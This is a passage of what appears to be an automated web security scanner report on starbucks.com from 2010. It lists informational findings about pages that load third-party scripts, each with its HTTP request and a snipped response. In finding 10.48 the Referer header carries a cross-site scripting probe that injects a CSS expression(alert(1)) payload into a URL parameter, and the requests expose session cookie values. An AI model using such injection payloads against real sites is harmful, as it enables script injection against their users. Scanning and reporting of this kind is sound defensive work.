<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.32. http://www.starbucks.com/coffeehouse/community  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /coffeehouse/community HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:37:38 GMT
Connection: close
Content-Length: 41337

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
<!-- Facebook Fan Box -->
               <script type="text/javascript" src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US"></script>
...[SNIP]...
<!-- Twitter Widget -->
               <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.33. http://www.starbucks.com/coffeehouse/community/mystarbucksidea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community/mystarbucksidea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/community/mystarbucksidea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:38:17 GMT
Connection: close
Content-Length: 41392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.34. http://www.starbucks.com/coffeehouse/entertainment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/entertainment

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/entertainment HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:24:29 GMT
Connection: close
Content-Length: 53206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.35. http://www.starbucks.com/coffeehouse/mobile-apps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:32:39 GMT
Connection: close
Content-Length: 41762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.36. http://www.starbucks.com/coffeehouse/mobile-apps/mystarbucks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/mystarbucks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps/mystarbucks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:32:52 GMT
Connection: close
Content-Length: 37684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.37. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:37:23 GMT
Connection: close
Content-Length: 38960

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.38. http://www.starbucks.com/coffeehouse/mobile-apps/starbucks-card-mobile-bb  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/mobile-apps/starbucks-card-mobile-bb

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/mobile-apps/starbucks-card-mobile-bb HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:35:46 GMT
Connection: close
Content-Length: 39455

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.39. http://www.starbucks.com/coffeehouse/wireless-internet  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/wireless-internet HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:24:40 GMT
Connection: close
Content-Length: 37733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.40. http://www.starbucks.com/coffeehouse/wireless-internet/in-canada  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/in-canada

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/wireless-internet/in-canada HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:24:53 GMT
Connection: close
Content-Length: 38013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.41. http://www.starbucks.com/coffeehouse/wireless-internet/starbucks-digital-network  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/wireless-internet/starbucks-digital-network

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /coffeehouse/wireless-internet/starbucks-digital-network HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:32:36 GMT
Connection: close
Content-Length: 38465

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.42. http://www.starbucks.com/customer-service/contact  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/contact

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/contact HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:24:00 GMT
Connection: close
Content-Length: 36903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.43. http://www.starbucks.com/customer-service/faqs/coffee  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffee

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/coffee HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:15:05 GMT
Connection: close
Content-Length: 37225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.44. http://www.starbucks.com/customer-service/faqs/coffeehouse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:08 GMT
Connection: close
Content-Length: 57890

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.45. http://www.starbucks.com/customer-service/faqs/menu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/menu

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/menu HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:16:37 GMT
Connection: close
Content-Length: 36767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.46. http://www.starbucks.com/customer-service/faqs/responsibility  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/responsibility

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/responsibility HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:18:45 GMT
Connection: close
Content-Length: 36990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.47. http://www.starbucks.com/customer-service/faqs/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /customer-service/faqs/shop HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:21:22 GMT
Connection: close
Content-Length: 51351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.48. http://www.starbucks.com/menu  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://www.starbucks.com/?8af12"style%3d"x%3aexpression(alert(1))"9f35c014f5e=1
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: www.starbucks.com
Proxy-Connection: Keep-Alive
Cookie: ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 18:28:32 GMT
Content-Length: 72282

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.49. http://www.starbucks.com/menu/drinks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:13:04 GMT
Connection: close
Content-Length: 61777

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.50. http://www.starbucks.com/menu/drinks/frappuccino-blended-beverages  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/drinks/frappuccino-blended-beverages

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/drinks/frappuccino-blended-beverages HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=qspoj3z1snwoz3gj; __utmz=246673883.1289931170.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=246673883.1144148522.1289931170.1289931170.1289931170.1; __utmc=246673883; __utmb=246673883.1.10.1289931170; ASP.NET_SessionId=lxhjfy55caulusmym0jnh545; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 16 Nov 2010 19:04:05 GMT
Connection: close
Content-Length: 50616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">
<html
xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/s
...[SNIP]...
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

10.51. http://www.starbucks.com/menu/food  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /menu/food HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
